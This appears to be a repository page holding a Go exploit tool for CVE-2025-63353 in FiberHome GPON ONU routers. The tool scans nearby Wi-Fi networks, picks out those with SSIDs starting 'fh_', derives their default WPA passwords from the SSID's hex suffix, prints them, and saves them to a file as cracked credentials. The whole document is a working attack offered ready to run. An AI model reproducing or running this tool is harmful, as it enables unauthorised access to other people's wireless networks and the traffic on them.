README.md
Rendering markdown...
package main
import (
"fmt"
"os"
"os/exec"
"strconv"
"strings"
"time"
)
func scanWiFi() ([]string, error) {
var cmd *exec.Cmd
if _, err := exec.LookPath("nmcli"); err == nil {
cmd = exec.Command("nmcli", "-t", "-f", "SSID", "dev", "wifi")
} else if _, err := exec.LookPath("netsh"); err == nil {
cmd = exec.Command("netsh", "wlan", "show", "networks")
} else if _, err := exec.LookPath("airport"); err == nil {
cmd = exec.Command("/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport", "-s")
} else {
return nil, fmt.Errorf("no WiFi scanner available")
}
output, err := cmd.Output()
if err != nil {
return nil, err
}
return parseNetworks(string(output)), nil
}
func parseNetworks(output string) []string {
var networks []string
seen := make(map[string]bool)
for line := range strings.SplitSeq(output, "\n") {
line = strings.TrimSpace(line)
if line == "" || strings.Contains(line, "BSSID") || strings.Contains(line, "SSID") {
continue
}
ssid := extractSSID(line)
if ssid != "" && !seen[ssid] {
seen[ssid] = true
networks = append(networks, ssid)
}
}
return networks
}
func extractSSID(line string) string {
// netsh: "SSID 1 : NetworkName"
if strings.Contains(line, "SSID") && strings.Contains(line, ":") {
parts := strings.Split(line, ":")
if len(parts) >= 2 {
ssid := strings.TrimSpace(parts[1])
if ssid != "" && ssid != "--" {
return ssid
}
}
return ""
}
// airport/nmcli: SSID as first field
fields := strings.Fields(line)
if len(fields) > 0 {
return fields[0]
}
return ""
}
func calculatePassword(ssid string) (string, error) {
hexA := strings.TrimPrefix(ssid, "fh_")
hexA = strings.TrimSuffix(hexA, "_5G")
if len(hexA) != 6 {
return "", fmt.Errorf("invalid hex length: %d", len(hexA))
}
hexAVal, err := strconv.ParseInt(hexA, 16, 32)
if err != nil {
return "", fmt.Errorf("invalid hex: %s", hexA)
}
hexB := 0xFFFFFF - int(hexAVal)
return fmt.Sprintf("wlan%06x | wlan%06X", hexB, hexB), nil
}
func saveResults(results []string) error {
file, err := os.Create("passwords")
if err != nil {
return err
}
defer file.Close()
fmt.Fprintf(file, "# CVE-2025-63353 Exploit Results\n")
fmt.Fprintf(file, "# Generated: %s\n", time.Now().Format("2006-01-02 15:04:05"))
fmt.Fprintf(file, "# Total vulnerable: %d\n\n", len(results))
for _, line := range results {
fmt.Fprintln(file, line)
}
return nil
}
func main() {
fmt.Println("[*] CVE-2025-63353 Scanner - FiberHome GPON ONU")
fmt.Println(strings.Repeat("=", 60))
start := time.Now()
networks, err := scanWiFi()
if err != nil {
fmt.Printf("[-] Scan failed: %v\n", err)
return
}
fmt.Printf("[*] Found %d networks (%.2fs)\n", len(networks), time.Since(start).Seconds())
var results []string
vulnerable := 0
for _, ssid := range networks {
if !strings.HasPrefix(ssid, "fh_") {
continue
}
vulnerable++
password, err := calculatePassword(ssid)
if err != nil {
fmt.Printf("[!] %s - %v\n", ssid, err)
continue
}
fmt.Printf("[+] %s:%s\n", ssid, password)
results = append(results, fmt.Sprintf("%s:%s", ssid, password))
}
if len(results) > 0 {
if err := saveResults(results); err != nil {
fmt.Printf("[ERR] Save failed: %v\n", err)
} else {
fmt.Printf("[*] Saved %d credentials to 'passwords'\n", len(results))
}
}
fmt.Println(strings.Repeat("=", 60))
fmt.Printf("[*] Scanned: %d | Vulnerable: %d | Cracked: %d\n",
len(networks), vulnerable, len(results))
}